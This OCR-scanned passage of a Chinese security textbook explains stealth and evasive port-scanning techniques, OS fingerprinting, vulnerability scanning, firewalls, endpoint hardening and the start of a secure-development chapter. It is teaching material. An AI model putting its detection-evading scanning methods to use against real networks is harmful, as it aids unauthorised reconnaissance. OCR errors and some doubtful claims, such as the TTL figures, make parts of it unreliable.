记录 下 来 ， 比 SYN 扫描 隐蔽 得 多 。 秘 密 扫 描 有 TCPFIN 扫描 、TCPACK 扫描 、NULL 扫描 、 
XMAS 扫描 和 SYN/ACK 扫描 等 。 

TCP FIN 扫描 的 原理 是 扫描 主机 向 目标 主机 发 送 FIN 数据 包 来 探听 端口 , 若 FIN 数据 包 
到 达 的 是 一 个 打开 的 端口 ， 数 据 包 则 被 简单 地 丢掉 ， 并 不 返回 任何 信息 ; 当 FIN 数据 包 到 达 
一 个 关闭 的 端口 ，TCP 会 把 它 判 断 成 是 错误 ， 数 据 包 会 被 丢掉 ， 并 返回 一 个 RST 数据 包 。 这 
种 方法 与 系统 的 TCP/IP 实现 有 一 定 关系 , 并 不 是 可 以 应 用 在 所 有 系统 上 , 有 的 系统 不 管 是 否 
打开 ， 都 回复 RST， 这 种 扫描 方法 不 适用 。 

TCP ACK 扫描 主要 用 来 探测 过 滤 性 防火 墙 的 过 滤 规 则 , 无 论 目 标 端口 的 状态 如 何 , 如 果 
发 送 ACK 报 文 ， 就 只 能 收 到 RST 响应 报 文 。 但 是 对 于 防火 墙 ， 如 果 端 口 被 过 滤 ， 要 么 收 不 
到 报 文 ， 要 么 收 到 ICMP( 目 标 不 可 达 )， 相 反 ， 如 果 没 有 被 过 滤 ， 则 收 到 有 关 RST 的 报 文 。 

XMAS 和 NULL 扫描 是 秘密 扫描 的 两 个 变种 XMAS 扫描 将 TCP 包 中 ACK FIN, RST, 
SYN, URG, PSH 标志 位 置 1， 而 NULL 扫描 关闭 所 有 标记 。 这 些 组 合 的 目的 是 为 了 通过 所 
谓 的 FIN 标记 监测 器 的 过 滤 。 目 标 端口 开放 的 情况 下 ， 目 标 主机 将 不 返回 任何 信息 ， 若 目标 
端口 关闭 ， 则 目标 主机 将 返回 RST 信息 。 

SYN/ACK 扫描 中 ,扫描 主机 不 向 目标 主机 发 送 SYN 数据 包 ， 而 先 发 送 SYN/ACK 数据 
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包 。 目 标 主 机 将 报错 ， 并 判断 为 一 次 错误 的 连接 。 若 目标 端口 开放 ， 目 标 主 机 将 返回 RST 信 
息 ; 若 目 标 端口 关闭 ， 目 标 主机 将 不 返回 任何 信息 ， 数 据 包 会 被 丢掉 。 

秘密 扫描 通常 适用 于 UNIX. 目标 主机 , 除了 少量 的 应 当 丢弃 数据 包 却 发 送 reset 信号 的 操 
作 系统 (包括 CISCO, BSDI, HP/UX, MVS 和 下 DO 外 。 在 Windows95/NT 环境 下 ， 该 方法 
无 效 ， 因 为 不 论 目标 端口 是 否 打开 ， 操 作 系统 都 发 送 RST， 与 SYN 扫描 类 似 ， 秘 密 扫描 也 
需要 自己 构造 他 包 。 


4) 其 他 扫描 技术 

其 他 扫描 技术 主要 有 UDP 扫描 、 了 P 分 段 扫描 和 代理 扫描 。 

UDP 是 面向 无 连接 不 可 靠 的 数据 包 协 议 , 建立 在 UDP 协议 基础 上 的 UDP 端口 扫描 是 不 
可 靠 的 。UDP 扫描 主要 是 UDP ICMP 端口 不 可 到 达 扫描 。 从 UDP 协议 可 知 ， 如 果 UDP 端 
口 打 开 ， 则 没有 应 答 报 文 ， 如 果 端 口 关 闭会 有 ICMP 报 文 (端口 不 可 达 )。 这 样 ， 只 需要 构造 
一 个 UDP 报 文 ， 观 察 响应 报 文 就 可 知道 目标 端口 的 状态 。 虽 然 用 UDP 提供 的 服务 不 多 ， 但 
是 有 些 没有 公开 的 服务 很 可 能 是 利用 的 高 端口 服务 。 如 果 需 要 证 实 有 这 样 的 服务 ， 就 可 以 利 
用 这 种 扫描 技术 。 

TE IP 分 段 扫描 中 , 主机 并 不 直接 发 送 TCP 探测 数据 包 , 而 将 数据 包 分 成 两 个 小 的 卫 段 ， 
这 样 就 将 一 个 TCP 头 分 成 好 几 个 数据 包 ， 从 而 过 滤器 就 很 难 检测 到 ,扫描 就 可 以 在 不 被 发 现 
的 情况 下 进行 。 但 是 对 IP 分 段 扫描 ， 一 些 程序 在 处 理 小 数据 包 时 会 有 些 麻烦 ， 并 且 不 同 的 操 
作 系 统 在 处 理 这 个 数据 包 时 ， 也 通常 会 出 现 问题 。 

代理 扫描 , 它 基 于 文件 传输 FTP 协议 。 FTP 服务 器 可 发 送 文件 到 互联 网 的 任何 地 方 , FTP 
代理 扫描 难以 跟踪 ， 许 多 扫描 器 利用 这 些 特点 实现 FTP 代理 扫描 。 FTP 端口 扫描 中 ， 扫 描 主 
机 和 目标 主机 之 间 有 一 个 能 支持 代理 选项 的 FTP 服务 器 、 通 过 代理 FTP 服务 器 与 扫描 主机 及 
目标 主机 的 连接 是 否 能 实现 来 判断 目标 主机 的 某 些 端口 的 状态 ， 由 于 有 代理 服务 器 的 参与 ， 
FTP 代理 扫描 难以 跟踪 ， 可 以 实现 基于 FTP 协议 的 代理 端口 扫描 。 

5. 操作 系统 探测 技术 


操作 系统 探测 技术 分 为 主动 探测 技术 和 被 动 探 测 技术 。 主 动 探测 技术 通过 向 目标 系统 发 

送 数据 ， 促 使 其 做 出 响应 ， 然 后 提出 和 分 析 响 应 数据 的 特征 信息 ， 以 推测 目标 系统 的 操作 系 

统 类 型 ， 被 动 探 测 技术 不 主动 激发 目标 系统 的 响应 ， 而 通过 网 络 嗅 探 来 截获 目标 系统 发 出 的 

数据 包 ， 从 中 提取 和 分 析 特 征 信息 来 获得 操作 系统 的 类 型 。 被 动 探 测 方式 的 隐蔽 性 较 强 ， 而 
主动 探测 方式 的 手段 更 显 丰 富 ， 更 具有 技巧 性 。 常 用 的 主动 探测 手段 有 : 

。 查询 标识 信息 ， 最 简单 的 情况 是 目标 系统 将 自身 操作 系统 的 有 关 信息 作为 服务 的 内 

容 提供 给 外 界 。 例 如 ， 在 系统 提供 的 服务 中 ， 给 用 户 返 回 的 信息 中 顺便 告知 操作 系 


统 的 类 型 。 
。 二进制 文件 分 析 ， 通 过 收集 、 分 析 目 标 系统 上 的 二 进 制 文件 ， 同 样 可 以 获得 其 操作 
系统 信息 。 


ICMP 信息 探测 ，Intemet 控制 消息 协议 ICMP) 是 TCP/IP. 协议 栈 中 的 一 个 组 成 部 分 ， 主 
要 用 于 在 全 主机 、 路 由 器 之 间 传 递 控制 消息 。 目 标 系统 响应 ICMP 命令 时 返回 的 数据 ， 常 常 
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反映 出 其 操作 系统 的 特征 。 例 如 ， 微 软 ICMP 请 求 报 文 的 有 效 载 荷 中 包含 字母 ， 而 Solaris 和 
Linux 的 ICMP 请 求 报 文 的 有 效 载 荷 中 包含 了 数字 和 符号 。 

被 动 探测 抓 取 目 标 主机 发 送出 来 的 TCP 报 文 , 通过 分 析 报 文中 的 有 关 字 段 , 获取 操作 系 
统 的 特征 信息 。 常 用 于 操作 系统 类 型 分 析 的 字段 有 

。 生存 期 (TTL)，TTL 表明 该 包 在 网 络 中 的 生存 时 间 。 不 同 操作 系统 的 默认 TTL 不 同 ， 

从 而 由 TCP 报 文中 的 TTL 推测 远程 操作 系统 类 型 。 例 如, 许多 操作 系统 的 默认 TIL 
小 于 30, Linux 和 FreeBSD 的 默认 TTL 值 被 设置 为 64。 当 被 抓 取 包 中 的 TIL 大 于 
30， 有 理由 推测 其 发 送 者 可 能 就 是 Linux 或 FreeBSD. 

。 滑动 窗口 大 小 ， 在 TCP 协议 中 不 同 操作 系统 设置 的 滑动 窗口 大 小 是 不 同 的 ， 因 此 也 
可 以 作为 探测 依据 。 例如 ，Cisco 路 由 器 和 微软 的 操作 系统 发 送 的 TCP 报 文 中 的 滑动 
窗口 在 一 次 会 话 过 程 中 是 经 常 改变 的 。Linux、FreeBSD 和 Solaris 系统 并 没有 实现 滑 
动 窗口 算法 ， 它 们 发 送 的 TCP 报 文 在 一 个 会 话 过 程 中 是 维持 不 变 的 ， 而 且 就 是 某 个 
默认 常数 。 

e 分 片 允许 位 (DF)， 许 多 操作 系统 会 使 用 DF 位 置 ， 但 是 SCO 和 ORENBSD 不 会 使 用 

DF 标志 。 

。 服务 类 型 (TOS), 当 ICMP 端 不 可 到 达 时 , 目的 主机 回 送 的 包 中 经 常 使 用 0, 但 是 Linux 
的 是 0xC0， 这 不 是 标准 的 TOS， 而 是 一 个 未 使 用 优先 域 (AFAIK) 的 一 部 分 。 

。 初始 化 序列 号 (ISN), 不 同 的 操作 系统 会 为 TCP 连接 选择 不 同 的 初始 化 序列 值 。 例如 ， 
新 版 本 的 Solaris, IRIX, FreeBSD, Digital, UNIX 使 用 的 是 一 个 随机 增 量 ，Windows 
采用 一 个 “时 间 相 关 ” 模 型 ， 每 隔 一 段 时 间 在 ISN 会 被 加 上 一 个 小 常数 。 

随 着 人 们 信息 安全 意识 的 增强 ， 信 息 安全 技术 的 发 展 以 及 网 络 复杂 环境 的 增加 ， 对 操作 
系统 的 准确 探测 也 会 变 得 更 难 。 要 提高 远程 操作 系统 探测 的 准确 度 和 效率 ， 不 仅 需 要 对 操作 
系统 远程 探测 技术 进行 更 深入 的 研究 ， 还 需要 结合 其 他 方法 进行 综合 探测 。 

6. 漏洞 扫描 技术 


系统 安全 漏洞 也 称 为 系统 脆弱 性 (vulnerabilitm)， 一 般 简称 漏洞 。 网 络 入 侵 的 过 程 一般 是 
利用 扫描 工具 对 要 入 侵 的 目标 进行 扫描 ， 找 到 目标 系统 的 漏洞 或 弱点 ， 然 后 进行 攻击 。 对 于 
系统 管理 员 来 说 ， 网 络 安全 的 第 一 步 工作 也 应 该 是 利用 扫描 工具 扫描 系统 ， 发 现 系统 的 漏洞 
和 弱点 后 采取 相应 的 补救 措施 。 漏 洞 是 计算 机 系统 在 硬件 、 软 件 、 协 议 的 设计 与 实现 过 程 或 
在 系统 安全 策略 上 存在 的 缺陷 和 不 足 。 漏 洞 的 产生 主要 是 由 于 程序 员 不 正确 和 不 安全 的 编程 
引起 的 。 漏 洞 扫描 实际 上 是 一 个 逐步 探测 漏洞 的 过 程 ， 也 是 一 个 漏洞 扫描 器 最 核心 的 部 分 。 
漏洞 扫描 主要 通过 以 下 方法 来 检查 目标 主机 是 否 存在 漏洞 : 

1) 在 端口 扫描 后 得 知 目标 主机 开启 的 端口 及 端口 上 的 网 络 服务 , 将 这 些 相 关 信息 与 网 络 
漏洞 扫描 系统 提供 的 漏洞 库 进 行 匹 配 ， 查 看 是 否 存在 满足 匹配 条 件 的 漏洞 。 

2) 通过 模拟 黑客 的 攻击 手法 , 对 目标 主机 系统 进行 攻击 性 的 安全 漏洞 扫描 ,如 测试 弱势 
口令 等 。 若 模拟 攻击 成 功 ， 则 表明 目标 主机 系统 存在 安全 漏洞 。 基 于 网 络 系统 漏洞 库 ， 漏 洞 
扫描 大 体 包括 CGI 漏洞 扫描 、POP3 漏洞 扫描 、FTP 漏洞 扫描 、SSH 漏洞 扫描 、HTTP 漏洞 
扫描 等 。 这 些 漏洞 扫描 将 扫描 结果 与 漏洞 库 相 关 数 据 比 较 得 到 漏洞 信息 。 漏 洞 扫描 还 包括 没 


y 
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有 相应 漏洞 库 的 各 种 扫描 , 比如 Unicode 遍历 目录 漏洞 探测 、FTP 弱势 密码 探测 `、OPEN Relay 
邮件 转发 漏洞 探测 等 ， 这 些 扫描 通过 使 用 插件 (功能 模块 技术 ) 进 行 模拟 攻击 ， 测 试 出 目标 主 
机 的 漏洞 信息 。 

3) 基于 网 络 系统 漏洞 库 的 漏洞 扫描 工作 时 ,首先 探测 目标 系统 的 存活 主机 , 对 存活 主机 
进行 端口 扫描 ， 确 定 系统 开放 的 端口 ， 同 时 根据 协议 指纹 技术 识别 出 主机 的 操作 系统 类 型 。 
然后 根据 目标 系统 的 操作 系统 平台 和 提供 的 网 络 服务 调用 漏洞 资料 库 中 已 知 的 各 种 漏洞 进行 
逐一 检测 ， 通 过 对 探测 响应 数据 包 的 分 析 判 断 是 否 存在 漏洞 。 基 于 网 络 系统 漏洞 库 的 漏洞 扫 
描 的 关键 部 分 就 是 它 所 使 用 的 漏洞 库 通过 采用 基于 规则 的 匹配 技术 ， 即 根据 安全 专家 对 网 络 
系统 安全 漏洞 、 黑 客 攻击 案例 的 分 析 和 系统 管理 员 对 网 络 系统 安全 配置 的 实际 经 验 ， 可 以 形 
成 一 套 标准 的 网 络 系统 漏洞 库 ， 然 后 在 此 基础 之 上 构成 相应 的 匹配 规则 ， 由 扫描 程序 自动 进 
行 漏洞 扫描 工作 。 漏 洞 库 信息 的 完整 性 和 有 效 性 决定 了 漏洞 扫描 系统 的 性 能 ， 漏 洞 库 的 修订 
和 更 新 的 性 能 也 会 影响 漏洞 扫描 系统 运行 的 时 间 。 因 此 ， 漏 洞 库 的 编制 不 仅 要 对 每 个 存在 安 
全 隐患 的 网 络 服务 建立 对 应 的 漏洞 库 文件 ， 而 且 应 能 满足 前 面 所 提出 的 性 能 要 求 。 

4) 在 基于 功能 模块 技术 的 漏洞 扫描 中 , 插件 是 由 脚本 语言 编写 的 子 程序 , 扫描 程序 可 以 
通过 调用 它 来 执行 漏洞 扫描 ， 检 测 出 系统 中 存在 的 一 个 或 多 个 漏洞 。 添 加 新 插件 就 可 以 使 漏 
洞 扫描 软件 增加 新 功能 ， 扫 描 出 更 多 漏洞 。 插 件 编写 规范 化 后 ， 甚 至 用 户 自 己 都 可 以 用 perl. 
C 或 自行 设计 的 脚本 语言 编写 的 插件 来 扩充 漏洞 扫描 软件 的 功能 。 这 种 技术 使 漏洞 扫描 软件 
的 升级 维护 变 得 相对 简单 ， 而 专用 脚本 语言 的 使 用 也 简化 了 编写 新 插件 的 编程 工作 ， 使 漏洞 
扫描 软件 具有 强 扩展 性 。 

除了 基于 网 络 的 漏洞 扫描 技术 外 , 还 有 基于 主机 的 漏洞 扫描 技术 。 基于 主机 的 漏洞 扫描 ， 
就 是 通过 以 root 身份 登录 目标 网 络 上 的 主机 ， 记 录 系 统 配置 的 各 项 主要 参数 ， 分 析 配置 的 漏 
洞 。 通过 这 种 方法 ,可 搜集 到 很 多 目标 主机 的 配置 信息 。 在 获得 目标 主机 配置 信息 的 情况 下 ， 
将 其 与 安全 配置 标准 库 进行 比较 和 匹配 ， 凡 不 满足 者 即 视 为 漏洞 。 通 常 在 目标 系统 上 安装 了 
一 个 代理 (agenb) 或 服务 (service)， 以 便 能 够 访问 所 有 的 文件 与 进程 ， 这 也 使 得 基于 主机 的 漏洞 
扫描 器 能 够 扫描 更 多 漏洞 。 


2.54 ”防火 墙 技术 


上 面 的 章节 中 我 们 不 止 一 次 提 到 “防火 墙 ?” 那么 它 到 底 是 什么 样 的 一 种 技术 ， 在 计算 
机 网 络 安全 中 起 到 什么 样 的 作用 呢 ? 本 节 就 来 讨论 一 下 。 
防火 墙 是 针对 网 络 安全 问题 应 用 最 为 广泛 的 一 款 安全 产品 。 它 通常 被 部 署 在 本 地 局 域 网 
和 互联 网 之 间 ， 依 据 已 经 配置 好 的 安全 规则 ， 过 滤 掉 那些 可 能 有 害 于 系统 安全 的 数据 流 。 防 火 
墙 主要 由 服务 访问 规则 、 验证 工具 、 包 过 滤 和 应 用 网 关 四 个 部 分 组 成 。 防火墙 的 主要 类 型 分 为 
。 网 络 层 防火 墙 : 网 络 层 防 火 墙 可 视 为 一 种 IP 封包 过 滤器 , 运作 在 底层 的 TCP/IP 协 议 
堆栈 上 。 我 们 可 以 以 枚 举 的 方式 ， 只 允许 符合 特定 规则 的 封包 通过 ， 其 余 的 一 概 禁 
止 穿越 防火 墙 (病毒 除外 , 防火 墙 不 能 防止 病毒 侵入 )。 这 些 规则 通常 可 以 经 由 管理 员 
定义 或 修改 ， 不 过 某 些 防火 墙 设备 可 能 只 能 套用 内 置 的 规则 。 它 工作 的 主要 参考 依 
据 是 ， 来 源 下地 址 、 来 源 端 口号 、 目 的 P 地 址 或 端口 号 、 服 务 类 型 ( 即 协议 类 型 ， 
HTTP. FTP 等 )。 
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应 用 层 防火 墙 : 它 是 在 TCP/P 堆栈 的 “应 用 层 ” 上 运作 ， 使 用 浏览 器 时 所 产生 的 数 
据 流 或 是 使 用 FTP 时 的 数据 流 都 是 属于 这 一 层 。 应 用 层 防 火 墙 可 以 拦截 进出 某 应 用 
程序 的 所 有 封包 ， 并 且 封 锁 其 他 的 封包 (通常 是 直接 将 封包 丢弃 )。 理 论 上 ， 这 一 类 的 
防火 墙 可 以 完全 阻 绝 外 部 的 数据 流 进 到 受 保护 的 机 器 里 。 

数据 库 防火 墙 ， 是 一 款 基 于 数据 库 协议 分 析 与 控制 技术 的 数据 库 安全 防护 系统 。 基 
于 主动 防御 机 制 ， 实 现 数据 库 的 访问 行为 控制 、 危 险 操作 阻 断 、 可 疑 行为 审计 。 


依据 防火 墙 的 作用 ， 其 主要 功能 应 包括 : 


代理 系统 ， 是 一 种 将 信息 从 防火 墙 的 一 侧 传送 到 另 一 侧 的 软件 模块 。 防 火 墙 采用 两 
种 代理 机 制 ， 一 种 用 于 代理 从 内 部 网 络 到 外 部 网 络 的 连接 ， 另 一 种 用 于 代理 从 外 部 
网 络 到 内 部 网 络 的 连接 。 前 者 采用 网 络 地 址 转换 (NAT) 技 术 来 解决 ， 后 者 采用 非 保 
密 的 用 户 定制 代理 或 保密 的 代理 系统 技术 来 解决 。 

多 级 过 滤 : 为 保证 系统 的 安全 性 和 防护 水 平 ， 防 火 墙 一 般 采用 三 级 过 滤 措 施 ， 并 辅 
以 鉴别 手段 。 在 分 组 过 滤 一 级 ， 能 过 滤 掉 所 有 的 源 路 由 分 组 和 假冒 的 中 源 地 址 ; 在 
应 用 级 网 关 一 级 ， 能 利用 FIP, SMTP 等 各 种 网 关 ， 控 制 和 监测 Intenet 提供 的 所 有 
通用 服务 ;在 电路 网 关 一 级 ， 实 现 内 部 主机 与 外 部 站 点 的 透明 连接 ， 并 对 服务 的 通 
行 实行 严格 控制 。 

网 络 地 址 转换 技术 (NAT): 防火 墙 利用 NAT 技术 能 透明 地 对 所 有 内 部 地 址 进行 转换 ， 
使 外 部 网 络 无 法 了 解 内 部 网 络 的 内 部 结构 ， 允 许 内 部 网 络 使 用 自己 定制 的 TP 地 址 和 
专用 网 络 ， 防 火 墙 能 详尽 记录 每 一 个 主机 的 通信 ， 确 保 每 个 分 组 送 往 正确 的 地 址 。 
使 用 NAT 的 网 络 时 ， 与 外 部 网 络 的 连接 只 能 由 内 部 网 络 发 起 ， 极 大 地 提高 了 内 部 网 
络 的 安全 性 。 NAT 的 另 一 个 显而易见 的 用 途 是 解决 瑟 地 址 匮乏 问题 。 
互联 网 网 关 技 术 : 由 于 是 直接 串 连 在 网 络 之 中 ， 防 火 墙 必须 支持 用 户 在 Intemet TE 
的 所 有 服务 , 同时 还 要 防止 与 ntemet 服务 有 关 的 安全 漏洞 。 故 它 要 能 以 多 种 安全 的 
应 用 服务 器 (包括 FIP, Finger, mail, Ident, News, WWW 等 ) 来 实现 网 关 功 能 。 
为 确保 服务 器 的 安全 性 ， 对 所 有 的 文件 和 命令 均 要 利用 “改变 根系 统 调用 (chroot)” 
进行 物理 上 的 隔离 。 在 域名 服务 方面 ， 新 一 代 防 火 墙 采用 两 种 独立 的 域名 服务 器 ， 
一 种 是 内 部 DNS 服务 器 ， 主 要 处 理 内 部 网 络 的 DNS 信息 ， 男 一 种 是 外 部 DNS 服务 
器 ， 专 门 用 于 处 理 机 构 内 部 向 Internet 提供 的 部 份 DNS 信息 。 

审计 和 告警 : 审计 功能 是 通过 日 志 来 体现 的 。 日 志文 件 包括 : 一 般 信息 、 内 核 信息 、 
核心 信息 、 接 收 邮件 、 邮 件 路 径 、 发 送 邮 件 、 已 收 消息 、 已 发 消息 、 连 接 需 求 、 已 
鉴别 的 访问 、 告 警 条 件 、 管 理 日 志 、 进 站 代理 、FTP 代理 、 出 站 代理 、 邮 件 服务 器 、 
域名 服务 器 等 。 告 警 功能 会 守住 每 一 个 TCP 或 UDP 探寻 ,并 能 以 发 出 邮件 、 声 响 等 
多 种 方式 报警 。 此 外 新 一 代 防 火 墙 还 在 网 络 诊断 ， 数 据 备份 与 保全 等 方面 具有 特色 。 
DMZ: DMZ 是 英文 “demilitarized zone” 的 缩写 ， 中 文 名 称 为 “隔离 区 ”， 也 称 “ 非 
军事 化 区 ”。 它 是 为 了 解决 安装 防火 墙 后 外 部 网 络 的 访问 用 户 不 能 访问 内 部 网 络 服 
务 器 的 问题 而 设立 的 一 个 非 安全 系统 与 安全 系统 之 间 的 缓冲 区 。 该 缓冲 区 位 于 内 部 
网 络 和 外 部 网 络 之 间 的 小 网 络 区 域内 。 在 这 个 小 网 络 区 域内 可 以 放置 一 些 必须 公开 
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的 服务 器 设施 ， 如 企业 Web 服务 器 、FTP 服务 器 和 论坛 等 。 另 一 方面 ， 通 过 这 样 一 
个 DMZ Kik, 更 加 有 效 地 保护 了 内 部 网 络 。 因 为 这 种 网 络 部 署 ， 比 起 一 般 的 防火 墙 

方案 ， 对 来 自 外 网 的 攻击 者 来 说 又 多 了 一 道 关卡 。 
除了 上 述 几 点 功能 ， 防 火 墙 还 具备 很 多 实用 功能 ， 在 这 里 不 一 一 介绍 。 总 之 ， 防 火 墙 
能 极 大 地 提高 一 个 内 部 网 络 的 安全 性 ， 并 通过 过 滤 不 安全 的 服务 而 降低 风险 ， 保 护 系 统 免 
受 攻击 。 


255 ”安全 配置 管理 


我 们 假设 防火 墙 被 攻击 者 采用 技术 手段 攻破 ， 直 接 到 达 想 要 访问 的 终端 设备 。 此 时 ， 谁 
来 保护 终端 ? 很 显然 ， 就 是 终端 自己 ! 终端 如 何 来 保护 自己 不 被 攻击 者 非法 访问 呢 ? 答案 就 
是 终端 系统 自身 的 安全 配置 。 这 里 的 终端 指 的 是 一 台 计 算 机 设备 ， 可 以 是 服务 器 ， 也 可 以 是 
个 人 PC， 或 者 联网 任 一 台 终端 设备 。 
目前 ， 对 终端 的 攻击 和 利用 终端 实施 的 窃 密 事件 急剧 增多 ， 终 端 安全 问题 日 益 突显 。 攻 
击 和 窃 密 是 终端 安全 的 外 部 原因 ， 计 算 机 系统 存在 缺陷 或 漏洞 、 系 统 配置 不 当 是 终端 安全 的 
内 部 原因 。 外 因 通 过 内 因 起 作用 ， 内 因 是 决定 因素 。 据 调查 ， 针 对 系统 核心 的 攻击 中 ，5% 是 
零 日 攻击 ，30% 是 没有 打 补 丁 ，65% 是 由 于 错误 的 配置 。 因 此 正确 的 安全 配置 才 是 保障 终端 
安全 性 的 必要 条 件 。 
安全 配置 分 为 硬件 安全 配置 、 软 件 安全 配置 和 核心 安全 配置 ， 分 别 介绍 如 下 : 
。 硬件 安全 配置 ， 根据 计算 机 硬件 安装 的 安全 要 求 ， 仅 可 安装 符合 规定 的 硬件 和 外 联 
设备 ， 关 闭 存在 安全 隐患 的 接口 以 及 驱动 ， 以 满足 政府 机 构 和 大 型 企业 对 硬件 环境 
的 安全 需求 。 包 括 计 算 机 部 件 清单 、 外 联 设 备 清单 、 外 联接 口 安 全 配置 和 硬件 驱动 
安全 配置 。 
。 软件 安全 配置 ， 根 据 计 算 机 软件 安装 的 安全 要 求 ， 仅 可 安装 符合 规定 的 操作 系统 和 
软件 ， 禁 止 非法 软件 安装 ， 以 满足 系统 对 安全 的 需求 。 
。 ”核心 安全 配置 ， 对 终端 操作 系统 、 办 公 软 件 和 浏览 器 、 邮 件 系统 软件 、 其 他 常用 软 
件 等 与 安全 有 关 的 可 选项 进行 参数 设置 ， 限 制 或 禁止 存在 安全 隐患 或 漏洞 的 功能 ， 
启用 或 加 强 安全 保护 功能 ， 增 强 终端 抵抗 安全 风险 的 能 力 。 包 括 操作 系统 安全 配置 、 
常用 软件 安全 配置 和 业务 应 用 软件 安全 配置 。 
硬件 安全 配置 管理 的 对 象 主要 包括 : 
1) 硬件 设备 管理 : 这 里 指 光驱 、 软 驱 、USB 移动 存储 、USB 全 部 接口 、 打 印 机 并 行 口 、 
调制 解 调 器 等 硬件 设备 ， 保 障 它们 正常 运行 。 
2) 网 络 端口 管理 ; 基于 各 种 网 络 协议 的 原理 和 各 种 网 络 软 件 对 网 络 的 实际 应 用 , 控制 各 
种 网 络 和 计算 机 端口 的 使 用 ， 降 低 被 利用 的 风险 。 例 如 ， 需 要 关闭 的 端口 包括 21 端口 、80 
端口 、135 端口 、137 端口 、138 端口 、139 端口 、445 端口 ， 在 客观 上 起 到 防火 墙 的 作用 。 
3) ICMP 协议 管理 ，ICMP 协议 是 判断 计算 机 间 的 互相 通信 信息 的 重要 手段 ， 根 据 实际 
需求 ， 可 以 对 其 进行 以 下 控制 :“ 禁 止 ping 入 ”， 是 指 不 允许 其 他 计算 机 (包括 局 域 网 计算 机 
和 远程 计算 机 ) 用 ping 命令 来 探测 本 地 计算 机 的 通信 状态 ;“ 禁 止 ping 出 ”， 是 指 不 允许 设置 
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的 对 象 客户 端 机 器 用 ping 命令 来 探测 其 他 计算 机 (包括 局 域 网 计算 机 和 远程 计算 机 ) 的 通信 状 
态 ;“ 禁 止 双向 ” 指 同时 禁止 任意 两 台 计 算 机 (至 少 有 一 台 是 本 地 计算 机 ) 的 通信 检测 。 
4)MAC 5 PRE: 绑 定 客户 端 亿 和 MAC， 防 止 非法 接 入 。 

5) 网 络 接 入 认证 : 用 户 可 通过 本 地 认证 、 Radius 认证 、 或 IP/MAC 绑 定 认 证 后 接 入 网 络 ， 
网 络 管理 员 可 对 辖 内 用 户 的 带宽 、 网 络 应 用 类 别 、 网 络 访问 时 间 、 网 站 过 滤 、 内 容 审计 、Web 
推送 等 进行 设 定 ， 便 于 进行 用 户 行为 管理 及 审计 和 违规 外 联 监控 。 

软件 安全 配置 管理 的 对 象 主要 包括 ; 

1) 软件 安装 监控 ; 监控 客户 机 安装 的 软件 是 否 违规 并 做 出 相应 的 处 理 。 输 入 禁止 安装 软 
件 的 主 程序 名 称 ， 并 支持 模糊 查询 技术 。 还 可 以 添加 自 定义 的 黑 名 单 和 白 名 单 ， 并 分 别 配置 
违规 处 理 措施 ， 高 级 策略 项 等 配置 。 

2) 软件 安装 行为 限制 ， 限 制 软件 安装 行为 ， 包 括 “ 禁 止 在 注册 表 Run 项 中 添加 自 启动 
项 ” “禁止 在 注册 表 Services 项 中 添加 自 启动 项 ”“ 禁 止 在 程序 启动 项 中 添加 项 “禁止 在 
程序 项 中 添加 快捷 方式 ” 同时 可 以 填写 例外 的 进程 和 文件 名 ， 使 策略 不 对 其 起 作用 。 

核心 安全 配置 的 对 象 主要 包括 : 

1) 操作 系统 安全 配置 : 包括 身份 鉴别 配置 ,， 访问 控制 配置 ,数据 保密 配置 ， 剩余 信息 保 
护 配置 ， 安 全 审计 配置 ， 系 统 组 件 安全 配置 。 

2) 办 公 软 件 安全 配置 ; 包括 禁用 所 有 未 经 验证 的 加 载 项 ， 限 制 下 载 和 安装 未 签名 的 
Active X 控件 ， 限 用 未 数字 签名 的 宏 ， 限 制 在 线 自 动 更 新 升级 、 网 上 下 载 前 贴画 和 模板 等 次 
源 、 访 问 超 链接 。 

3) 浏览 器 安全 配置 ， 禁 止 运行 Java 小 程序 脚本 ， 限 制 下 载 和 安装 未 签名 的 Active X 15: 
件 ， 开 启 浏览 器 的 保护 模式 ， 域 管理 配置 ， 隐 私 保护 配置 。 

4) 邮件 系统 安全 配置 : 应 配置 安全 的 邮箱 登录 口令 的 长 度 和 复杂 度 ; 对 本 地 存储 的 邮件 
应 开启 加 密 功能 ， 发 送 邮 件 应 使 用 数字 签名 和 数字 加 密 技术 ， 接 收 邮 件 应 对 数字 签名 进行 验 
证 ; 应 开启 加 密 协议 收发 邮件 ， 禁 止 直接 运行 附件 中 存在 安全 隐患 的 类 型 文件 ， 禁 止 运行 邮 
件 中 的 超 链接 ， 启 用 垃圾 邮件 过 滤 功 能 。 

5) 其 他 常用 软件 安全 配置 : 账户 及 密码 应 进行 安全 配置 ; 开启 或 增强 安全 保护 功能 ; 限 
制 或 禁止 存在 的 安全 漏洞 的 服务 和 功能 。 

通过 上 述 安全 配置 管理 的 对 象 和 内 容 ， 我 们 可 以 看 出 ， 一 个 完善 的 安全 配置 管理 ， 对 我 
们 的 系统 是 至 关 重 要 的 ， 它 是 我 们 面 对 安 全 威胁 的 最 后 一 FM 
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本 章 介绍 了 密码 学 中 的 加 密 方 法 和 加 密 原 理 。 在 使 用 一 个 安全 系统 时 ， 需 要 检查 和 验证 
请 求 服务 的 用 户 身 份 ， 这 时 用 到 了 22 一 节 中 的 身份 验证 技术 。 当 用 户 成 功 登 录 后 ， 需 要 通 
过 访问 控制 技术 对 文件 资源 进行 保护 和 管理 .2.4 一 节 的 安全 保障 技术 是 判断 信息 系统 可 信 度 
的 基础 ， 它 能 够 检验 并 且 提高 系统 可 信 度 。 计 算 机 网 络 安全 部 分 主要 通过 OSI 安全 体系 结构 
引出 网 络 中 的 安全 机 制 、 防 火 墙 技术 、 入 侵 检 测 和 安全 扫描 方面 的 知识 。 
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本 章 导 读 

本 章 主要 介绍 计算 机 软件 安全 的 设计 流程 、 安 全 的 软件 开发 周期 ， 并 阐述 了 规范 的 安全 软 
件 在 不 同 的 开发 阶段 需要 的 不 同 侧重 点 ， 详 细 描 述 安全 软件 开发 中 会 遇 到 的 问题 和 解决 方案 。 

应 掌握 的 知识 要 点 : 

e 安全 的 软件 开发 周期 

e 安全 原则 、 规 则 及 规章 

e 安全 需求 : 攻击 用 例 

”架构 和 设计 评审 /威胁 建 模 

e 安全 的 编码 原则 

e &&/ E Sl Six 

e 判定 可 利用 性 

e 软件 的 安全 部 署 

e 软件 安全 编程 


3.1 安全 的 软件 开发 周期 


在 传统 的 软件 开发 生命 周期 (SDLC，Software Development Lifecycle) 中 ， 安 全 测试 往往 
是 一 种 事后 反应 ， 即 安全 检验 和 测试 工作 总 是 被 拖延 到 软件 开发 完成 之 后 。 漏 洞 是 软件 的 一 
